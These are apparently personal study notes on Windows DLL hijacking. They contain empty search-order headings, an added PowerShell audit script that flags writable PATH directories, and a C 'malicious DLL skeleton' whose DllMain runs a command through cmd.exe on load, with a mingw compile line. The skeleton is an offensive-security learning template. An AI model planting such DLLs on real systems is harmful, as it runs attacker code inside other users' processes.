DLL Hijacking

author: Nathan Acks
date: 2022-04-22

Windows DLL Search Order

Windows DLL search order if SafeDllSearchMode is enabled:

Windows DLL search order if SafeDllSearchMode is disabled:

Note that it seems more or less impossible to determine which DLLs an application is searching for without already having SYSTEM access (so that tools like ProcMon can be run).
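A defender-side check for the search-order settings discussed above, as an added example that is not part of the original notes. It reads SafeDllSearchMode from its documented registry location and flags machine-wide PATH directories (which are part of the DLL search order) that are missing or writable by accounts other than SYSTEM, Administrators and TrustedInstaller. The function names are illustrative.

```powershell
# Added example: audit SafeDllSearchMode and the ACLs of machine PATH directories.
$trustedSids = @(
    'S-1-5-18',      # NT AUTHORITY\SYSTEM
    'S-1-5-32-544',  # BUILTIN\Administrators
    'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'  # TrustedInstaller
)

function Get-SafeDllSearchMode {
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager'
    $val = (Get-ItemProperty -Path $key -Name SafeDllSearchMode `
            -ErrorAction SilentlyContinue).SafeDllSearchMode
    # The value is normally absent; Windows then treats the mode as enabled.
    if ($null -eq $val) { 'Enabled (default, value not set)' }
    elseif ($val -eq 0) { 'DISABLED' }
    else                { 'Enabled' }
}

function Get-UntrustedWriters {
    param([string]$Path)
    $fsr = [System.Security.AccessControl.FileSystemRights]
    # CreateFiles/AppendData plus raw GENERIC_WRITE and GENERIC_ALL bits.
    $writeMask = [int]($fsr::CreateFiles -bor $fsr::AppendData) -bor 0x40000000 -bor 0x10000000
    $inheritOnly = [int][System.Security.AccessControl.PropagationFlags]::InheritOnly
    $acl = Get-Acl -LiteralPath $Path
    # Ask for SIDs so the comparison does not depend on the display language.
    $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
    foreach ($r in $rules) {
        if ($r.AccessControlType -ne 'Allow') { continue }
        if (([int]$r.PropagationFlags -band $inheritOnly) -ne 0) { continue }  # not applied to the directory itself
        if ($trustedSids -contains $r.IdentityReference.Value) { continue }
        if (([int]$r.FileSystemRights -band $writeMask) -ne 0) { $r.IdentityReference.Value }
    }
}

"SafeDllSearchMode: $(Get-SafeDllSearchMode)"
$dirs = [Environment]::GetEnvironmentVariable('Path', 'Machine') -split ';' |
    Where-Object { $_ } | Select-Object -Unique
foreach ($d in $dirs) {
    $dir = [Environment]::ExpandEnvironmentVariables($d)
    if (-not (Test-Path -LiteralPath $dir -PathType Container)) {
        "MISSING   $dir  (review who could create it)"
        continue
    }
    $sids = @(Get-UntrustedWriters -Path $dir | Select-Object -Unique)
    if ($sids.Count -gt 0) { "WRITABLE  $dir  by $($sids -join ', ')" }
}
```

Deny rules are not evaluated here, so a flagged directory should be confirmed by reviewing its full ACL before changing it.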

Malicious DLL Skeleton

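#include <windows.h>
#include <stdlib.h>	/* system() */

/* DllMain runs inside the loading process as soon as the DLL is mapped. */
BOOL WINAPI DllMain
(HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
	if (dwReason == DLL_PROCESS_ATTACH) {
		/* Backslashes must be escaped inside a C string literal. */
		system("cmd.exe /C whoami > C:\\Temp\\dll.txt");
		ExitProcess(0);
	}
	return TRUE;
}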

Compile with mingw (on Linux!):

x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll